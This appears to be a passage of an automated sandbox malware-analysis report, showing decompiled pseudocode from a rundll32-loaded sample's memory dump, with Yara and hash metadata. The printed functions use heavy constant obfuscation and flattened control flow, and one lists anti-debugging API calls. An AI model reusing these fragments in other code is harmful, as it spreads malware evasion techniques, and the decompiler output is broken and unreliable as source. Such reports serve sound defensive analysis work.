				_v88 = 0xcc2476;
				_v88 = _v88 + 0x4ceb;
				_v88 = _v88 ^ 0xdbab884b;
				_t228 = 0x4f;
				_v88 = _v88 / _t228;
				_v88 = _v88 ^ 0x02ce2d39;
				_v20 = 0x9b21e;
				_v20 = _v20 + 0x218b;
				_v20 = _v20 ^ 0x00037084;
				_v76 = 0xcba48;
				_t229 = 0x5a;
				_t222 = _v12;
				_v76 = _v76 * 0x7b;
				_v76 = _v76 + 0x3acc;
				_v76 = _v76 << 0x10;
				_v76 = _v76 ^ 0xbb6cb0a9;
				_v80 = 0x9c886e;
				_v80 = _v80 ^ 0x88757b42;
				_t230 = 0x5c;
				_v80 = _v80 / _t229;
				_v80 = _v80 << 0xe;
				_v80 = _v80 ^ 0x5c6ae118;
				while(1) {
					L1:
					_t213 = 0xa360d2e;
					do {
						while(_t257 != _t213) {
							if(_t257 == 0xb87cfc3) {
								_t223 =  *0x6a3e10; // 0x0
								_t224 = _t223 + 0x1c;
								while(1) {
									__eflags =  *_t224 - _t230;
									if(__eflags == 0) {
										break;
									}
									_t224 = _t224 + 2;
									__eflags = _t224;
								}
								_t222 = _t224 + 2;
								_t257 = 0xc7301de;
								goto L1;
							} else {
								if(_t257 == 0xc7301de) {
									_push(_v48);
									_push(_v44);
									_t216 = E0069DCF7(_v40, 0x681080, __eflags);
									_pop(_t236);
									__eflags = E0068AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
									E0068A8B0(_v60, _t216, _v64);
									_t261 =  &(_t261[0xf]);
									L14:
									_t213 = 0xa360d2e;
									_t230 = 0x5c;
									goto L15;
								} else {
									if(_t257 == 0xdd28c3f) {
										E00681FD1(_v20, _v76, _v80, _v16);
									} else {
										if(_t257 != 0xf52a3f4) {
											goto L15;
										} else {
											_t257 = 0xb87cfc3;
											continue;
										}
									}
								}
							}
							L18:
							return _v12;
						}
						_t214 = E00681F53(_v16, _v84, _v52, _t222, _v56, _v88);
						_t261 =  &(_t261[4]);
						__eflags = _t214;
						_t257 = 0xdd28c3f;
						_t191 = _t214 == 0;
						__eflags = _t191;
						_v12 = 0 | _t191;
						goto L14;
						L15:
						__eflags = _t257 - 0x57f878b;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                      0x00683e3f
                                                                                                                      0x00683e42
                                                                                                                      0x00683e4c
                                                                                                                      0x00683e52
                                                                                                                      0x00683e5a
                                                                                                                      0x00683e5f
                                                                                                                      0x00683e67
                                                                                                                      0x00683e6f
                                                                                                                      0x00683e77
                                                                                                                      0x00683e7f
                                                                                                                      0x00683e87
                                                                                                                      0x00683e8f
                                                                                                                      0x00683e9c
                                                                                                                      0x00683ea0
                                                                                                                      0x00683ea5
                                                                                                                      0x00683ead
                                                                                                                      0x00683eb5
                                                                                                                      0x00683ebd
                                                                                                                      0x00683ec5
                                                                                                                      0x00683ecd
                                                                                                                      0x00683ed5
                                                                                                                      0x00683edd
                                                                                                                      0x00683ee5
                                                                                                                      0x00683eed
                                                                                                                      0x00683efb
                                                                                                                      0x00683f00
                                                                                                                      0x00683f06
                                                                                                                      0x00683f0e
                                                                                                                      0x00683f16
                                                                                                                      0x00683f1e
                                                                                                                      0x00683f23
                                                                                                                      0x00683f2b
                                                                                                                      0x00683f37
                                                                                                                      0x00683f3c
                                                                                                                      0x00683f42
                                                                                                                      0x00683f4a
                                                                                                                      0x00683f52
                                                                                                                      0x00683f57
                                                                                                                      0x00683f5f
                                                                                                                      0x00683f67
                                                                                                                      0x00683f6f
                                                                                                                      0x00683f7c
                                                                                                                      0x00683f7d
                                                                                                                      0x00683f81
                                                                                                                      0x00683f89
                                                                                                                      0x00683f91
                                                                                                                      0x00683f9e
                                                                                                                      0x00683fa2
                                                                                                                      0x00683faa
                                                                                                                      0x00683fb2
                                                                                                                      0x00683fc0
                                                                                                                      0x00683fc4
                                                                                                                      0x00683fcc
                                                                                                                      0x00683fd4
                                                                                                                      0x00683fd9
                                                                                                                      0x00683fe1
                                                                                                                      0x00683fe9
                                                                                                                      0x00683ff1
                                                                                                                      0x00683ff9
                                                                                                                      0x00684001
                                                                                                                      0x00684009
                                                                                                                      0x00684011
                                                                                                                      0x00684019
                                                                                                                      0x00684023
                                                                                                                      0x00684030
                                                                                                                      0x00684038
                                                                                                                      0x00684040
                                                                                                                      0x00684045
                                                                                                                      0x0068404a
                                                                                                                      0x00684052
                                                                                                                      0x0068405a
                                                                                                                      0x00684062
                                                                                                                      0x00684067
                                                                                                                      0x0068406f
                                                                                                                      0x00684077
                                                                                                                      0x0068407f
                                                                                                                      0x0068408d
                                                                                                                      0x00684092
                                                                                                                      0x00684098
                                                                                                                      0x006840a0
                                                                                                                      0x006840a8
                                                                                                                      0x006840b0
                                                                                                                      0x006840b8
                                                                                                                      0x006840c5
                                                                                                                      0x006840c6
                                                                                                                      0x006840cc
                                                                                                                      0x006840d0
                                                                                                                      0x006840d8
                                                                                                                      0x006840dd
                                                                                                                      0x006840e5
                                                                                                                      0x006840ed
                                                                                                                      0x006840fb
                                                                                                                      0x006840fc
                                                                                                                      0x00684100
                                                                                                                      0x00684105
                                                                                                                      0x0068410d
                                                                                                                      0x0068410d
                                                                                                                      0x0068410d
                                                                                                                      0x00684112
                                                                                                                      0x00684112
                                                                                                                      0x0068411c
                                                                                                                      0x006841bb
                                                                                                                      0x006841c1
                                                                                                                      0x006841c9
                                                                                                                      0x006841c9
                                                                                                                      0x006841cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006841c6
                                                                                                                      0x006841c6
                                                                                                                      0x006841c6
                                                                                                                      0x006841ce
                                                                                                                      0x006841d1
                                                                                                                      0x00000000
                                                                                                                      0x00684122
                                                                                                                      0x00684128
                                                                                                                      0x00684146
                                                                                                                      0x0068414f
                                                                                                                      0x00684157
                                                                                                                      0x0068415d
                                                                                                                      0x006841a0
                                                                                                                      0x006841ae
                                                                                                                      0x006841b1
                                                                                                                      0x006841b6
                                                                                                                      0x00684208
                                                                                                                      0x0068420a
                                                                                                                      0x0068420f
                                                                                                                      0x00000000
                                                                                                                      0x0068412a
                                                                                                                      0x00684130
                                                                                                                      0x0068422e
                                                                                                                      0x00684136
                                                                                                                      0x0068413c
                                                                                                                      0x00000000
                                                                                                                      0x00684142
                                                                                                                      0x00684142
                                                                                                                      0x00000000
                                                                                                                      0x00684142
                                                                                                                      0x0068413c
                                                                                                                      0x00684130
                                                                                                                      0x00684128
                                                                                                                      0x00684235
                                                                                                                      0x00684240
                                                                                                                      0x00684240
                                                                                                                      0x006841f0
                                                                                                                      0x006841f7
                                                                                                                      0x006841fa
                                                                                                                      0x006841fc
                                                                                                                      0x00684201
                                                                                                                      0x00684201
                                                                                                                      0x00684204
                                                                                                                      0x00000000
                                                                                                                      0x00684210
                                                                                                                      0x00684210
                                                                                                                      0x00684210
                                                                                                                      0x00000000
                                                                                                                      0x0068421c

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                      • API String ID: 0-3177096336
                                                                                                                      • Opcode ID: 351a353afe4de99b8e1213a95de4994611b884fa53a5755ef6f9e064a2070c2e
                                                                                                                      • Instruction ID: 6548d93ba7b4743e98455db3baa409fcdece0e467dadae9391db361caf532e39
                                                                                                                      • Opcode Fuzzy Hash: 351a353afe4de99b8e1213a95de4994611b884fa53a5755ef6f9e064a2070c2e
                                                                                                                      • Instruction Fuzzy Hash: A2A150B26083419FC398CF25C88A41BBBF2FBD4758F108A1DF1958A260D7B5894ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068B74D Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068B74D(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				void* _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t266;
				void* _t267;
				signed int* _t270;
				signed int* _t271;

				_t270 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0x6c2b32;
				_v8 = 0x58b11;
				_v64 = 0x37f8ee;
				_v64 = _v64 + 0xffff6702;
				_v64 = _v64 ^ 0xad40df3f;
				_v64 = _v64 ^ 0xad79282c;
				_v100 = 0x6d524;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 + 0x2921;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00050ee9;
				_v28 = 0x9e9a;
				_t266 = __edx;
				_t237 = __ecx;
				_t267 = 0x52ffaa2;
				_t239 = 0xb;
				_v28 = _v28 / _t239;
				_v28 = _v28 ^ 0x00028e70;
				_v32 = 0x2476b5;
				_t240 = 0x6f;
				_v32 = _v32 / _t240;
				_v32 = _v32 ^ 0x0008b44d;
				_v60 = 0x9e7d2d;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 << 0xe;
				_v60 = _v60 ^ 0x02752993;
				_v24 = 0xe09194;
				_t241 = 0x44;
				_v24 = _v24 / _t241;
				_v24 = _v24 ^ 0x0009703f;
				_v96 = 0x854eb1;
				_v96 = _v96 + 0xc1c6;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 | 0x594c04b7;
				_v96 = _v96 ^ 0x5dd9e9b5;
				_v20 = 0x86d30b;
				_v20 = _v20 | 0xe45dff90;
				_v20 = _v20 ^ 0xe4d4624e;
				_v92 = 0x8501b9;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x2f;
				_v92 = _v92 + 0xe9ed;
				_v92 = _v92 ^ 0x0060653e;
				_v52 = 0xaa921f;
				_v52 = _v52 ^ 0x3dfd2146;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x1ea8ab64;
				_v56 = 0x2765e6;
				_v56 = _v56 ^ 0x5c8ea534;
				_v56 = _v56 | 0xccee86e2;
				_v56 = _v56 ^ 0xdcebf872;
				_v88 = 0x89b797;
				_v88 = _v88 + 0x84ba;
				_v88 = _v88 + 0xc14;
				_v88 = _v88 | 0xbe23ba3f;
				_v88 = _v88 ^ 0xbea6e118;
				_v48 = 0x866a1d;
				_v48 = _v48 >> 9;
				_v48 = _v48 * 0x16;
				_v48 = _v48 ^ 0x0007ec78;
				_v16 = 0x7d5d8a;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000578c4;
				_v68 = 0x2c77b1;
				_v68 = _v68 | 0xad369f51;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xdff48475;
				_v72 = 0x3ef83;
				_v72 = _v72 << 3;
				_v72 = _v72 + 0xb46;
				_v72 = _v72 ^ 0x001ba742;
				_v76 = 0x4a0f2c;
				_t242 = 0x6a;
				_v76 = _v76 * 0x54;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x33e29f20;
				_v36 = 0x9fb368;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x000f389a;
				_v40 = 0x5cfe3a;
				_v40 = _v40 + 0x27ff;
				_v40 = _v40 ^ 0x005ee30c;
				_v104 = 0xfd26ea;
				_v104 = _v104 << 9;
				_v104 = _v104 + 0xffff1095;
				_v104 = _v104 + 0xffffd24c;
				_v104 = _v104 ^ 0xfa4b2973;
				_v80 = 0xbb493f;
				_v80 = _v80 + 0x4ae2;
				_v80 = _v80 | 0xbb4dbcb8;
				_v80 = _v80 + 0x3bc7;
				_v80 = _v80 ^ 0xbbf0b3fa;
				_v44 = 0xfc3c2e;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0xffff4208;
				_v44 = _v44 ^ 0x3c281d99;
				_v84 = 0xc50344;
				_v84 = _v84 | 0xb9ed19f4;
				_v84 = _v84 / _t242;
				_t243 = 0x6b;
				_v84 = _v84 / _t243;
				_v84 = _v84 ^ 0x000f16db;
				while(1) {
					L1:
					_t231 = 0xc3f018b;
					do {
						L2:
						while(_t267 != 0x52ffaa2) {
							if(_t267 == 0x865547f) {
								_t243 = _v88;
								_t232 = E0068CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
								_t270 =  &(_t270[2]);
								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
								__eflags = _t232;
								_t231 = 0xc3f018b;
								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t267 == 0xb133873) {
								_push(_v32);
								_t233 = E0069C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
								_t271 =  &(_t270[4]);
								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
								__eflags = _t233;
								if(_t233 != 0) {
									E00687B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
									_push( *((intOrPtr*)(_t266 + 0x38)));
									_push(_v56);
									_push(_v52);
									_t243 = _v20;
									E00687C37(_v20, _v92);
									_t270 =  &(_t271[6]);
									_t267 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t267 == 0xb7a2405) {
									return E00699E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
								}
								if(_t267 != _t231) {
									goto L13;
								} else {
									_t233 = E006846BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00684C5D, _v104);
									_t270 =  &(_t270[0xa]);
									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
									if(_t233 == 0) {
										_t267 = 0xb7a2405;
										while(1) {
											L1:
											_t231 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t233;
						}
						_t267 = 0xb133873;
						L13:
						__eflags = _t267 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t231;
				}
			}









































                                                                                                                      0x0068b74d
                                                                                                                      0x0068b750
                                                                                                                      0x0068b755
                                                                                                                      0x0068b75d
                                                                                                                      0x0068b765
                                                                                                                      0x0068b76d
                                                                                                                      0x0068b775
                                                                                                                      0x0068b77d
                                                                                                                      0x0068b785
                                                                                                                      0x0068b78d
                                                                                                                      0x0068b792
                                                                                                                      0x0068b79a
                                                                                                                      0x0068b79f
                                                                                                                      0x0068b7a7
                                                                                                                      0x0068b7b7
                                                                                                                      0x0068b7b9
                                                                                                                      0x0068b7bf
                                                                                                                      0x0068b7c4
                                                                                                                      0x0068b7c9
                                                                                                                      0x0068b7cf
                                                                                                                      0x0068b7d7
                                                                                                                      0x0068b7e3
                                                                                                                      0x0068b7e8
                                                                                                                      0x0068b7ee
                                                                                                                      0x0068b7f6
                                                                                                                      0x0068b7fe
                                                                                                                      0x0068b803
                                                                                                                      0x0068b808
                                                                                                                      0x0068b810
                                                                                                                      0x0068b81c
                                                                                                                      0x0068b81f
                                                                                                                      0x0068b823
                                                                                                                      0x0068b82b
                                                                                                                      0x0068b833
                                                                                                                      0x0068b840
                                                                                                                      0x0068b844
                                                                                                                      0x0068b84c
                                                                                                                      0x0068b854
                                                                                                                      0x0068b85c
                                                                                                                      0x0068b864
                                                                                                                      0x0068b86c
                                                                                                                      0x0068b874
                                                                                                                      0x0068b87e
                                                                                                                      0x0068b882
                                                                                                                      0x0068b88a
                                                                                                                      0x0068b892
                                                                                                                      0x0068b89a
                                                                                                                      0x0068b8a2
                                                                                                                      0x0068b8a6
                                                                                                                      0x0068b8ae
                                                                                                                      0x0068b8b6
                                                                                                                      0x0068b8be
                                                                                                                      0x0068b8c6
                                                                                                                      0x0068b8ce
                                                                                                                      0x0068b8d6
                                                                                                                      0x0068b8de
                                                                                                                      0x0068b8e6
                                                                                                                      0x0068b8ee
                                                                                                                      0x0068b8f6
                                                                                                                      0x0068b8fe
                                                                                                                      0x0068b908
                                                                                                                      0x0068b90c
                                                                                                                      0x0068b914
                                                                                                                      0x0068b91c
                                                                                                                      0x0068b923
                                                                                                                      0x0068b930
                                                                                                                      0x0068b938
                                                                                                                      0x0068b940
                                                                                                                      0x0068b945
                                                                                                                      0x0068b94d
                                                                                                                      0x0068b955
                                                                                                                      0x0068b95a
                                                                                                                      0x0068b962
                                                                                                                      0x0068b96a
                                                                                                                      0x0068b979
                                                                                                                      0x0068b97c
                                                                                                                      0x0068b980
                                                                                                                      0x0068b985
                                                                                                                      0x0068b98d
                                                                                                                      0x0068b995
                                                                                                                      0x0068b99a
                                                                                                                      0x0068b9a2
                                                                                                                      0x0068b9aa
                                                                                                                      0x0068b9b2
                                                                                                                      0x0068b9ba
                                                                                                                      0x0068b9c2
                                                                                                                      0x0068b9c7
                                                                                                                      0x0068b9cf
                                                                                                                      0x0068b9d7
                                                                                                                      0x0068b9df
                                                                                                                      0x0068b9e7
                                                                                                                      0x0068b9ef
                                                                                                                      0x0068b9f7
                                                                                                                      0x0068b9ff
                                                                                                                      0x0068ba07
                                                                                                                      0x0068ba0f
                                                                                                                      0x0068ba14
                                                                                                                      0x0068ba1c
                                                                                                                      0x0068ba24
                                                                                                                      0x0068ba2c
                                                                                                                      0x0068ba3c
                                                                                                                      0x0068ba44
                                                                                                                      0x0068ba47
                                                                                                                      0x0068ba4b
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba58
                                                                                                                      0x00000000
                                                                                                                      0x0068ba58
                                                                                                                      0x0068ba6a
                                                                                                                      0x0068bb2d
                                                                                                                      0x0068bb31
                                                                                                                      0x0068bb36
                                                                                                                      0x0068bb39
                                                                                                                      0x0068bb3c
                                                                                                                      0x0068bb40
                                                                                                                      0x0068bb45
                                                                                                                      0x00000000
                                                                                                                      0x0068bb45
                                                                                                                      0x0068ba76
                                                                                                                      0x0068bac0
                                                                                                                      0x0068bad3
                                                                                                                      0x0068bad8
                                                                                                                      0x0068badb
                                                                                                                      0x0068bade
                                                                                                                      0x0068bae0
                                                                                                                      0x0068baf8
                                                                                                                      0x0068bafd
                                                                                                                      0x0068bb00
                                                                                                                      0x0068bb04
                                                                                                                      0x0068bb0c
                                                                                                                      0x0068bb10
                                                                                                                      0x0068bb15
                                                                                                                      0x0068bb18
                                                                                                                      0x00000000
                                                                                                                      0x0068bb18
                                                                                                                      0x0068ba78
                                                                                                                      0x0068ba7a
                                                                                                                      0x00000000
                                                                                                                      0x0068bb75
                                                                                                                      0x0068ba82
                                                                                                                      0x00000000
                                                                                                                      0x0068ba88
                                                                                                                      0x0068baa9
                                                                                                                      0x0068baae
                                                                                                                      0x0068bab1
                                                                                                                      0x0068bab6
                                                                                                                      0x0068babc
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x00000000
                                                                                                                      0x0068ba53
                                                                                                                      0x0068ba53
                                                                                                                      0x0068bab6
                                                                                                                      0x0068ba82
                                                                                                                      0x0068bb7d
                                                                                                                      0x0068bb7d
                                                                                                                      0x0068bb4d
                                                                                                                      0x0068bb52
                                                                                                                      0x0068bb52
                                                                                                                      0x0068bb52
                                                                                                                      0x00000000
                                                                                                                      0x0068ba58

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                      • API String ID: 0-1675410552
                                                                                                                      • Opcode ID: 69228edd1fab55b14a1a47fee3f30ed958737d76b4b8c7d78f58f87a8f5d4094
                                                                                                                      • Instruction ID: 3565794bbfef45539e8dfb36a3db067db17a6ca0b5c7675f6498c558e4148001
                                                                                                                      • Opcode Fuzzy Hash: 69228edd1fab55b14a1a47fee3f30ed958737d76b4b8c7d78f58f87a8f5d4094
                                                                                                                      • Instruction Fuzzy Hash: CBB12E724083809FC358DF65C58A40BFBE2FBC5758F108A1CF59A96260D7B5CA59CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                      • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                      • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                      • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A0056 Relevance: 6.7, Strings: 5, Instructions: 443COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E006A0056() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				unsigned int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				void* _t500;
				void* _t502;
				intOrPtr* _t509;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				void* _t540;
				void* _t546;
				intOrPtr _t556;
				void* _t603;
				signed int _t605;
				signed int* _t609;

				_t609 =  &_v1748;
				_v1648 = 0xded5e0;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 | 0x3a1a97de;
				_v1648 = _v1648 ^ 0x3a1a9ff7;
				_v1608 = 0x6694ca;
				_v1608 = _v1608 | 0xdc2b4f48;
				_v1608 = _v1608 ^ 0x5c6fdfcb;
				_v1712 = 0x53f825;
				_v1712 = _v1712 >> 2;
				_v1712 = _v1712 ^ 0x4e440c95;
				_v1712 = _v1712 | 0x7235b0e7;
				_v1712 = _v1712 ^ 0x7e75f2fd;
				_v1632 = 0xc6d169;
				_v1568 = 0;
				_t603 = 0x9805d0a;
				_t525 = 0x52;
				_v1632 = _v1632 / _t525;
				_t526 = 0x67;
				_v1632 = _v1632 * 0x1e;
				_v1632 = _v1632 ^ 0x0048bcfb;
				_v1596 = 0x189afb;
				_v1596 = _v1596 >> 0xe;
				_v1596 = _v1596 ^ 0x000d7c1d;
				_v1724 = 0x4bfed1;
				_v1724 = _v1724 * 0x63;
				_v1724 = _v1724 * 0x55;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x61069d5d;
				_v1580 = 0x401b2b;
				_v1580 = _v1580 + 0x7090;
				_v1580 = _v1580 ^ 0x00412b45;
				_v1672 = 0xbaa782;
				_v1672 = _v1672 / _t526;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 ^ 0x000e5528;
				_v1624 = 0x1efbce;
				_t527 = 0x4f;
				_v1624 = _v1624 / _t527;
				_v1624 = _v1624 ^ 0x000dc160;
				_v1572 = 0x9ef416;
				_t605 = 0x62;
				_v1572 = _v1572 / _t605;
				_v1572 = _v1572 ^ 0x00079814;
				_v1612 = 0x4efe15;
				_t528 = 0x43;
				_v1612 = _v1612 / _t528;
				_v1612 = _v1612 ^ 0x000e5446;
				_v1640 = 0x94326d;
				_t529 = 0x77;
				_v1640 = _v1640 / _t529;
				_t530 = 0x35;
				_v1640 = _v1640 / _t530;
				_v1640 = _v1640 ^ 0x000d83b8;
				_v1676 = 0x511d41;
				_t531 = 9;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 ^ 0xeef8e480;
				_v1676 = _v1676 ^ 0xcb952f57;
				_v1708 = 0x4e0a18;
				_v1708 = _v1708 ^ 0x2110c6ad;
				_v1708 = _v1708 | 0x4a7f48ac;
				_v1708 = _v1708 + 0xffff2cb4;
				_v1708 = _v1708 ^ 0x6b758b76;
				_v1732 = 0x7a6741;
				_t123 =  &_v1732; // 0x7a6741
				_v1732 =  *_t123 / _t531;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 << 7;
				_v1732 = _v1732 ^ 0x36245548;
				_v1700 = 0x42788;
				_t532 = 0x44;
				_v1700 = _v1700 / _t532;
				_v1700 = _v1700 | 0xce808109;
				_v1700 = _v1700 + 0xffff7a0f;
				_v1700 = _v1700 ^ 0xce88d2ed;
				_v1740 = 0x39c25c;
				_v1740 = _v1740 + 0xf71;
				_t533 = 0x75;
				_v1740 = _v1740 / _t533;
				_v1740 = _v1740 ^ 0xc60840fd;
				_v1740 = _v1740 ^ 0xc60d36f5;
				_v1716 = 0x2bcc6c;
				_v1716 = _v1716 + 0x97be;
				_v1716 = _v1716 >> 0xd;
				_v1716 = _v1716 ^ 0xcb020dbc;
				_v1716 = _v1716 ^ 0xcb05808e;
				_v1604 = 0x3f7ac0;
				_v1604 = _v1604 + 0xafc6;
				_v1604 = _v1604 ^ 0x0048c4ef;
				_v1576 = 0x9f011d;
				_v1576 = _v1576 ^ 0x8bb25c52;
				_v1576 = _v1576 ^ 0x8b2a60ae;
				_v1684 = 0xe4045e;
				_v1684 = _v1684 * 0x42;
				_v1684 = _v1684 * 0xc;
				_v1684 = _v1684 ^ 0xc16ccb70;
				_v1720 = 0x76be5;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 * 0x3b;
				_v1720 = _v1720 + 0xffffaa4e;
				_v1720 = _v1720 ^ 0xfff1ea6d;
				_v1680 = 0x1fb4c3;
				_v1680 = _v1680 << 4;
				_v1680 = _v1680 << 0xc;
				_v1680 = _v1680 ^ 0xb4c6c556;
				_v1644 = 0xb0dbcd;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 << 0x10;
				_v1644 = _v1644 ^ 0x800a09c5;
				_v1600 = 0x1a67e8;
